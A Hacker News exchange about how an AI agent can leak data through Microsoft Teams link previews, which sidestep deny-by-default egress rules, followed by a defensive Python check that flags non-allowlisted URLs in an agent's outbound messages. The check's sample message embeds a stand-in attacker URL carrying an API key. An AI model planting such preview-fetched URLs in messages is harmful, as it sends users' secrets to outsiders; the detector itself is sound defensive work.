Hacker News

bberenberg · yesterday at 11:05 PM · 1 reply

Only if it has access to exfiltrate data. We deny by default and the company has to allowlist each individual destination.


Replies

degamad · today at 2:30 AM

> Only if it has access to exfiltrate data.

Or if it has access to a tool call which allows it to exfiltrate data.

In the example identified, the AI agent never accesses the exfiltration URL.

The agent sends an innocuous-looking message to a user via a Teams message.

MSTeams previews the link, accessing the exfiltration URL.
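The gap the reply describes, a deny-by-default network egress policy that a link preview sidesteps because the fetch is made by the messaging platform rather than by the agent, suggests applying the same destination allowlist to the content of the agent's outbound messages. The following Python check is an added example, not code from either commenter: it extracts URLs from a message (bare and inside markdown links), compares each host against an allowlist, and flags any non-allowlisted URL, noting whether its path or query string carries data that a preview fetch would deliver to the destination. The allowlist entries, the `.invalid` host and the sample message are constructed for the example.

```python
import re
from urllib.parse import urlparse

# Constructed allowlist; stands in for the company's own per-destination list.
ALLOWED_HOSTS = {"internal.example.com", "docs.example.com"}

# Matches bare http(s) URLs and the target of markdown links [text](url).
# Stops at whitespace, angle brackets, parentheses, brackets and quotes.
URL_RE = re.compile(r"https?://[^\s<>()\]\"']+")

# Constructed sample: an agent message that looks benign but embeds a
# non-allowlisted URL whose query string would carry a secret to the
# destination as soon as the chat client renders a link preview.
SAMPLE_MESSAGE = (
    "Hi, your report is ready: "
    "[download](https://attacker.invalid/collect?api_key=sk-constructed-000). "
    "Also see https://docs.example.com/guide."
)


def host_allowed(host, allowed=ALLOWED_HOSTS):
    """True if host is an allowlisted host or a subdomain of one.
    Suffix matching is done per label so 'docs.example.com.attacker.invalid'
    does not pass."""
    host = host.lower().rstrip(".")
    return any(host == a or host.endswith("." + a) for a in allowed)


def find_urls(text):
    """Return the http(s) URLs in text, with trailing sentence punctuation removed."""
    return [u.rstrip(".,;:!?") for u in URL_RE.findall(text)]


def check_outbound_message(text, allowed=ALLOWED_HOSTS):
    """Return a finding for every URL whose host is not on the allowlist.

    carries_data is True when the URL has a query string or a non-root path,
    i.e. when a preview fetch would transmit more than just the hostname."""
    findings = []
    for url in find_urls(text):
        parsed = urlparse(url)
        host = parsed.hostname or ""
        if host_allowed(host, allowed):
            continue
        carries_data = bool(parsed.query) or len(parsed.path) > 1
        findings.append({"url": url, "host": host, "carries_data": carries_data})
    return findings


if __name__ == "__main__":
    for finding in check_outbound_message(SAMPLE_MESSAGE):
        print(f"BLOCK {finding['host']} (carries_data={finding['carries_data']}): {finding['url']}")
```

In practice the check sits between the agent and the message-sending tool, so a flagged message is held rather than delivered; the per-label suffix match in `host_allowed` matters because an allowlist compared with a plain substring test is easy to satisfy with a lookalike hostname.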